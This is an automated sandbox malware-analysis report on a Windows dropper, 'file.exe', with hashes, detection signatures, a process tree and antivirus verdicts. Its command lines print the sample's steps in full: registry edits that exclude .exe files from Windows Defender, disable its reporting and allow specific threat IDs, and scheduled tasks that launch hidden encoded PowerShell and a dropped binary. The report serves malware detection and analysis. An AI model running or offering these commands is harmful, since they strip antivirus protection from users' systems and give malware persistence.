Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753408
MD5: e99e15a440798e20c682eb859b3f7885
SHA1: b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256: c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags: exe
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • file.exe (PID: 5932 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
    • Install.exe (PID: 4760 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
      • Install.exe (PID: 5620 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
        • forfiles.exe (PID: 4732 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3096 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6180 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5064 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6152 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 6172 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 6236 cmdline: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6276 cmdline: schtasks /run /I /tn "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6332 cmdline: schtasks /DELETE /F /TN "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6488 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6316 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 6752 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • pJKKXsE.exe (PID: 6576 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
    • powershell.exe (PID: 6604 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 
Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6176 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 6192 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6180 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4520 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2992 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1364 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6216 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6156 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6232 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1876 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4036 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2372 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3668 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6268 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6312 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • gpscript.exe (PID: 6920 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • cleanup
No configs have been found
No yara matches

Persistence and Installation Behavior

Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, ParentProcessId: 5620, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 6236, ProcessName: schtasks.exe
No Snort rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe, ReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe, ReversingLabs: Detection: 51%
Source: file.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe, Code function: 1_2_0040553A FindFirstFileA,1_2_0040553A
Source: C:\Users\user\Desktop\file.exe, Code function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,1_2_004055DE
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\
Source: powershell.exe, 00000018.00000002.420007208.00000173FD929000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.430262427.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: Install.exe, 00000005.00000002.484866347.0000000001ABA000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe, Process created: Commandline size = 3260
Source: file.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, File deleted: C:\Windows\SysWOW64\GroupPolicySMsYe
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, File created: C:\Windows\system32\GroupPolicy\gpt.ini
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 00413954 appears 179 times
Source: file.exe, 00000001.00000000.284047943.0000000000427000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exe, Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\user\Desktop\file.exe
Source: file.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe, Process created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe, Process created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
